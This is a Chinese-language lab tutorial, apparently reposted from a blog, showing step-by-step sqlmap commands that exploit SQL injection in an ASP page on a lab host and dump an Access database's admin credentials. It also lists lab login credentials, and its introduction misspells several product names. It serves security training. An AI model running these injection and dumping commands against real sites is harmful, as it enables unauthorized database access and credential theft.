标签：Sqlmap sqlmap admin 数据库 SQL 所示 如图 注入

实验目的

利用sqlmap命令破解出access数据中的admin的密码bfpns

实验原理

SQLMap是一个先进的自动化SQL注入工具，其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞。目前支持的数据库管理系统包括Ms-soL、MySQL、Oracde和PostgreSQL.也能够识别诸如DB2、Informix. Sybase、Interbase和MS Access之类的数据库系统。SQLMap采用四种独特的SQL注入技术，分别是盲推理SQL注入、ｕｎｉｏｎ查询SQL注入、堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹、枚举、数据提取、访问目标文件系统，并在获取完全操作权限时执行任意命令。此外，该工具还可以从Burp Proxy直Web Scarab日志及标准的文本文件中解析目标列表。更突出的是，它提供采用分类Coogle dorks扫描Oragle拽索引擎，获取指定目标的功能。

实验内容

sqlmap命令破解出access数据中的admin的密码bfpns

实验环境描述

攻击机Kali操作系统

用户名密码为：root toor

靶机

用户名密码为：admin 123456

实验步骤

一、Sqlmap破解access数据库 1.1单击桌面空白处，右键菜单选择“在终端中打开”。如图1所示（有询问信息返回的，看返回的信息，输入Y或者N,看返回的情况而定）；

1.2在终端中输入命令“sqlmap –u http://192.168.10.147:99/onews.asp?id=45”，-u扫描注入点扫描目标主机，检测出的信息准确。如图2所示

1.3在终端中输入命令“sqlmap –u http://192.168.10.147:99/onews.asp?id=45 --users”获取到用户名。如图3所示

1.4在终端中输入命令“sqlmap –u http://192.168.10.147:99/onews.asp?id=45 -–dump –tables”探测数据库和表信息。如图4所示

1.5显示探测出来的字段信息。如图5所示

1.6针对admin表探测出的结构。如图6所示

1.7在终端中输入命令” sqlmap -u ＂http://192.168.10.147:99/onews.asp?id=45＂ --dump -T admin -C admin,password”,进行暴库,获得用户名和密码。如图7所示

1.8已经猜解出来用户名为admin。如图8所示

标签：Sqlmap,sqlmap,admin,数据库,SQL,所示,如图,注入
来源： https://www.cnblogs.com/lzkalislw/p/13627173.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。